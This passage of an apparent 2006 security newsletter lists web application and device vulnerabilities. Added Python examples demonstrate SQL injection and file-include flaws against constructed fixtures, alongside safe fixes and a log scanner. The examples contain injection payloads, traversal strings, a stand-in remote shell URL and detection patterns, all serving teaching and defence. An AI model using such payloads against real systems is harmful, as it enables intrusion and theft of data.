  • Description: DUportal Pro is a web portal application. DUportal Pro is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "iCat" parameter of the "cat.asp" script. DUportal Pro version 3.4 is vulnerable.
  • Ref: http://www.aria-security.net/advisory/duportal.txt

  • 06.17.54 - CVE: CVE-2006-1817
  • Platform: Web Application - SQL Injection
  • Title: warforge.News Authcheck.PHP SQL Injection
  • Description: warforge.NEWS is a news reader application implemented in PHP. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "authusername" cookie parameter of the "authcheck.php" script. warforge.NEWS version 1.0 is affected.
  • Ref: http://evuln.com/vulns/125/summary.html

  • 06.17.55 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Invision Power Board Func_msg.PHP SQL Injection
  • Description: Invision Power Board is web forum software. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "to_by_id" parameter of the "func_msg.php" script. Invision Power Board version 2.1.4 is affected.
  • Ref: http://www.securityfocus.com/archive/1/432248
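Two of the SQL injection entries above are worth separating: the warforge.NEWS issue is reached through a cookie value ("authusername"), which the user never types into a form, and the Invision Power Board issues are reached through parameters that should be integers ("ck", "to_by_id"), where no quote character is needed to alter the query. The Python below is an added example, not code from any product listed here, using an in-memory SQLite table constructed for the purpose; it shows both contexts side by side with their parameterized fixes.

```python
import sqlite3


def setup_db():
    """Constructed fixture standing in for an application's user table."""
    conn = sqlite3.connect(':memory:')
    conn.execute(
        'CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)'
    )
    conn.executemany(
        'INSERT INTO users (username, is_admin) VALUES (?, ?)',
        [('alice', 1), ('bob', 0)],
    )
    return conn


# A cookie value the client sets freely; "a user would never type that" is
# not a defence for a value that never passes through a form.
COOKIE_PAYLOAD = "' OR is_admin = 1 --"


def authcheck_vulnerable(conn, authusername):
    """String context: the cookie value is spliced into a quoted literal, so a
    single quote ends the literal and '--' comments out the trailing quote."""
    sql = f"SELECT username, is_admin FROM users WHERE username = '{authusername}'"
    return conn.execute(sql).fetchall()


def authcheck_safe(conn, authusername):
    """Bound parameter: the value can only ever be compared as data."""
    sql = 'SELECT username, is_admin FROM users WHERE username = ?'
    return conn.execute(sql, (authusername,)).fetchall()


def user_by_id_vulnerable(conn, to_by_id):
    """Numeric context: there are no quotes to break out of, so quote
    escaping (addslashes-style) would not have helped here either."""
    sql = f'SELECT id, username FROM users WHERE id = {to_by_id} ORDER BY id'
    return conn.execute(sql).fetchall()


def user_by_id_safe(conn, to_by_id):
    """Validate the type first, then bind."""
    try:
        uid = int(to_by_id)
    except (TypeError, ValueError):
        return []
    sql = 'SELECT id, username FROM users WHERE id = ? ORDER BY id'
    return conn.execute(sql, (uid,)).fetchall()


if __name__ == '__main__':
    db = setup_db()
    print('cookie, vulnerable:', authcheck_vulnerable(db, COOKIE_PAYLOAD))
    print('cookie, safe      :', authcheck_safe(db, COOKIE_PAYLOAD))
    print('id, vulnerable    :', user_by_id_vulnerable(db, '2 OR 1=1'))
    print('id, safe          :', user_by_id_safe(db, '2 OR 1=1'))
```

The vulnerable cookie check returns the administrator row for a value that names no user at all, and the vulnerable numeric lookup returns every row. Neither fix depends on guessing which characters are dangerous: the string case binds the value, the numeric case rejects anything that is not an integer before the query is built.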

  • 06.17.56 - CVE: CVE-2006-1212
  • Platform: Web Application
  • Title: CoreNews Multiple Input Validation Vulnerabilities
  • Description: CoreNews is a web-based news application implemented in PHP. It is vulnerable to multiple input validation issues such as a remote file include issue and SQL injections. CoreNews versions 2.0.1 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431761

  • 06.17.57 - CVE: CVE-2006-2002
  • Platform: Web Application
  • Title: My Gaming Ladder Stats.PHP Remote File Include
  • Description: My Gaming Ladder is a ladder and tournament web application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "dir[base]" parameter of the "stats.php" script. My Gaming Ladder version 7.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431902

  • 06.17.58 - CVE: Not Available
  • Platform: Web Application
  • Title: Clansys Index.PHP Remote Code Execution
  • Description: Clansys is a web-based application. Insufficient sanitization of the "page" parameter in the "index.php" script exposes the application to a remote code execution issue. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/17660

  • 06.17.59 - CVE: Not Available
  • Platform: Web Application
  • Title: SL_site Multiple Input Validation Vulnerabilities
  • Description: SL_site is a shopping cart and billing application implemented in PHP. It is prone to multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input. SQL Injection and cross-site scripting attacks are possible.
  • Ref: http://www.securityfocus.com/bid/17667

  • 06.17.60 - CVE: Not Available
  • Platform: Web Application
  • Title: MKPortal Multiple Input Validation Vulnerabilities
  • Description: MKPortal is a content management system for the vBulletin package. It is prone to multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input. MKPortal version 1.1 in conjunction with vBulletin 3.5.4 is vulnerable to these issues.
  • Ref: http://www.securityfocus.com/archive/1/431759

  • 06.17.61 - CVE: CVE-2006-1995
  • Platform: Web Application
  • Title: Scry Gallery Directory Traversal
  • Description: Scry Gallery is an image gallery application. It is vulnerable to a directory traversal issue due to insufficient sanitization of user-supplied input to the "p" parameter of the "index.php" script. Scry Gallery version 1.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431716

  • 06.17.62 - CVE: CVE-2006-1994
  • Platform: Web Application
  • Title: dForum Multiple Remote File Include Vulnerabilities
  • Description: dForum is a web-based forum application. It is vulnerable to multiple remote file include issues due to insufficient sanitization of user-supplied input to the "DFORUM_PATH" variable in a variety of scripts. dForum version 1.5 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431758

  • 06.17.63 - CVE: CVE-2006-2014
  • Platform: Web Application
  • Title: SL_site Gallerie.PHP Information Disclosure
  • Description: SL_site is a shopping cart and billing application implemented in PHP. SL_site is prone to an information disclosure vulnerability. This may be exploited by using directory traversal sequences "../" in the "rep" parameter of the "gallerie.php" script.
  • Ref: http://www.securityfocus.com/bid/17672

  • 06.17.64 - CVE: Not Available
  • Platform: Web Application
  • Title: built2go Movie Review Movie_CLS.PHP3 Remote File Include
  • Description: built2go Movie Review is a web application for reviewing movies. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "full_path" parameter of the "movie_cls.php" script. built2go Movie Review versions 2B and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/17679

  • 06.17.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Invision Power Board Search.PHP Script Injection
  • Description: Invision Power Board is web forum software. It is vulnerable to a PHP script execution issue: a malicious user can inject script code into a message posting and use a flaw in the "search.php" script to execute it. Invision Power Board versions 2.1.5 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431990

  • 06.17.66 - CVE: Not Available
  • Platform: Web Application
  • Title: DCForumLite DCBoard.CGI Multiple Input Validation Vulnerabilities
  • Description: DCForumLite is a forum application implemented in Perl. It is prone to multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input. DCForumLite version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/17697

  • 06.17.67 - CVE: Not Available
  • Platform: Web Application
  • Title: MySmartBB Multiple Input Validation Vulnerabilities
  • Description: MySmartBB is a bulletin board application. Insufficient sanitization of the "id" and "username" parameters of the "misc.php" script exposes the application to cross-site scripting and SQL injection issues. MySmartBB version 1.1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/17707

  • 06.17.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Jupiter CMS Index.PHP Local File Include
  • Description: Jupiter CMS is a content management system implemented in PHP. It is prone to a local file include vulnerability in the "index.php" script. Versions 1.1.5 and prior are vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/17716
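Several of the Web Application entries above are one defect seen from different angles: a request value ("page", "dir[base]", "DFORUM_PATH", "p", "rep", "full_path") is joined onto a file path and handed to include() or a file read. A remote URL gives remote file inclusion, "../" gives directory traversal or local file inclusion. The Python below is an added example, not code from any product listed here; Python has no include(), so a file read stands in for it, and the web root, the "pages" directory and the file contents are a constructed fixture. It shows the unvalidated pattern beside a hardened loader that applies an allowlist, refuses URL schemes and confirms the resolved path stays inside the intended directory.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit


def build_sample_site():
    """Constructed fixture: a web root with a 'pages' directory the application
    is meant to read from, and a config file outside it that must stay private."""
    root = tempfile.mkdtemp(prefix='site_')
    os.mkdir(os.path.join(root, 'pages'))
    with open(os.path.join(root, 'pages', 'news.tpl'), 'w') as f:
        f.write('news template')
    with open(os.path.join(root, 'config.inc'), 'w') as f:
        f.write('db_password=secret')
    return root


def load_page_vulnerable(root, page):
    """Mirrors include($base . $_GET['page']) with no validation:
    '../config.inc' walks out of the pages directory, and an absolute
    path replaces the base entirely."""
    with open(os.path.join(root, 'pages', page)) as f:
        return f.read()


# Allowlist for page names: a single filename component with a fixed extension.
PAGE_NAME = re.compile(r'[A-Za-z0-9_-]+\.tpl')


def load_page_safe(root, page):
    """Three independent checks; any one alone stops the samples below, and
    the realpath check also catches symlinks inside the pages directory."""
    if urlsplit(page).scheme:
        raise ValueError('remote include rejected: ' + page)
    if not PAGE_NAME.fullmatch(page):
        raise ValueError('page name not in allowed form: ' + page)
    pages_dir = os.path.realpath(os.path.join(root, 'pages'))
    path = os.path.realpath(os.path.join(pages_dir, page))
    if os.path.commonpath([pages_dir, path]) != pages_dir:
        raise ValueError('path escapes pages directory: ' + page)
    with open(path) as f:
        return f.read()


def safe_rejects(root, page):
    """True if the hardened loader refuses the given request value."""
    try:
        load_page_safe(root, page)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    site = build_sample_site()
    print('vulnerable, normal   :', load_page_vulnerable(site, 'news.tpl'))
    print('vulnerable, traversal:', load_page_vulnerable(site, '../config.inc'))
    for value in ('news.tpl', '../config.inc', 'http://evil.example/shell.txt', '/etc/passwd'):
        print(f'safe, {value!r}: rejected={safe_rejects(site, value)}')
```

For the PHP applications in the entries, the equivalent of the scheme check is also a server setting: with allow_url_fopen disabled, a remote URL in an include() path cannot be fetched at all, which limits the remote file include entries to a failed include rather than code execution. That does nothing for the traversal and local include cases, which still need the path validation shown here.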

  • 06.17.69 - CVE: Not Available
  • Platform: Network Device
  • Title: Juniper JUNOSe DNS Client Denial of Service
  • Description: Juniper JUNOSe is prone to a denial of service when its DNS client handles malformed DNS datagrams sent to it. See the referenced advisory for the list of affected versions.
  • Ref: http://www.securityfocus.com/bid/17693

  • 06.17.70 - CVE: CVE-2006-2043, CVE-2006-2044, CVE-2006-2045
  • Platform: Network Device
  • Title: IP3 Networks NetAccess NA75 Multiple Local Vulnerabilities
  • Description: IP3 Networks NetAccess NA75 devices are rack-mounted network devices designed for hotels and hotspots. They are susceptible to multiple local vulnerabilities. These issues are present in version 4.0.34 of the device's firmware.
  • Ref: http://www.securityfocus.com/archive/1/432007


  • 06.17.72 - CVE: Not Available
  • Platform: Network Device
  • Title: Oce 3121/3122 Printer Denial of Service
  • Description: The embedded web server of the Oce 3121/3122 printer is prone to a remote denial of service when it receives an overly long URI request.
  • Ref: http://www.securityfocus.com/bid/17715
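Most of this week's web application entries, and the Oce printer entry, leave a request-level signature that a web server log already records: a URL in a parameter value (remote file include), "../" in a path or parameter (traversal and local include), script markup or event handlers (cross-site scripting), SQL keywords in a value (SQL injection), and an over-long URI (the printer denial of service). The scanner below is an added example, not part of the newsletter or any product listed; it applies those signatures to Apache-style access log lines that are constructed here, with made-up addresses and timestamps, borrowing the script and parameter names from the entries above only to make the samples realistic. The 2048-byte URI threshold is an assumption chosen for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined"-style line, reduced to the fields the scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/[\d.]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

RULES = {
    # a parameter value that is itself a URL: remote file include attempt
    'rfi': re.compile(r'^(?:https?|ftp)://', re.I),
    # script markup or an on* event handler in a parameter value
    'xss': re.compile(r'<script|javascript:|\bon[a-z]+\s*=', re.I),
    # the common SQL injection shapes seen in the entries above
    'sqli': re.compile(
        r"\bunion\s+(?:all\s+)?select\b|'\s*(?:or|and)\b|\bor\s+\d+\s*=\s*\d+", re.I
    ),
}
MAX_URI_LEN = 2048  # assumed threshold for the long-URI rule


def classify(uri):
    """Return the rule names a single request URI trips, in a fixed order."""
    hits = []
    decoded = unquote(unquote(uri))  # tolerate single and double percent-encoding
    parts = urlsplit(decoded)
    values = [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    if any(RULES['rfi'].match(v) for v in values):
        hits.append('rfi')
    if '../' in decoded or '..\\' in decoded:
        hits.append('traversal')
    for name in ('xss', 'sqli'):
        if any(RULES[name].search(v) for v in values):
            hits.append(name)
    if len(uri) > MAX_URI_LEN:
        hits.append('long_uri')
    return hits


def scan(lines):
    """Yield (line number, rule, client ip, truncated uri) for every hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in classify(m['uri']):
            findings.append((n, rule, m['ip'], m['uri'][:80]))
    return findings


# Constructed sample log; one benign request followed by one line per class.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/May/2006:10:00:01 +0000] "GET /lms/a2z.jsp?kwd=perl HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/May/2006:10:00:02 +0000] "GET /lms/a2z.jsp?kwd=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 640',
    '198.51.100.9 - - [01/May/2006:10:00:03 +0000] "GET /stats.php?dir[base]=http://203.0.113.77/shell.txt? HTTP/1.0" 200 2201',
    '198.51.100.9 - - [01/May/2006:10:00:04 +0000] "GET /gallerie.php?rep=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 200 1730',
    '198.51.100.9 - - [01/May/2006:10:00:05 +0000] "GET /index.php?act=Msg&to_by_id=1%20UNION%20SELECT%20username,password%20FROM%20members HTTP/1.0" 200 988',
    '192.0.2.44 - - [01/May/2006:10:00:06 +0000] "GET /' + 'A' * 4096 + ' HTTP/1.0" 500 0',
]


if __name__ == '__main__':
    for n, rule, ip, uri in scan(SAMPLE_LOG):
        print(f'line {n}: {rule:10} {ip:15} {uri}')
```

Two caveats a practitioner would expect. First, this only sees what the server logs: the warforge.NEWS issue rides in a cookie and most form-based injections travel in POST bodies, neither of which appears in the request line, so the scanner is a triage aid rather than a detector for every entry above. Second, the SQL and script patterns will match some legitimate traffic (a forum search for the word "union select", for instance); the signals worth alerting on are the remote-URL and traversal rules, which almost never occur in normal requests, with the others used to prioritise review.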

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.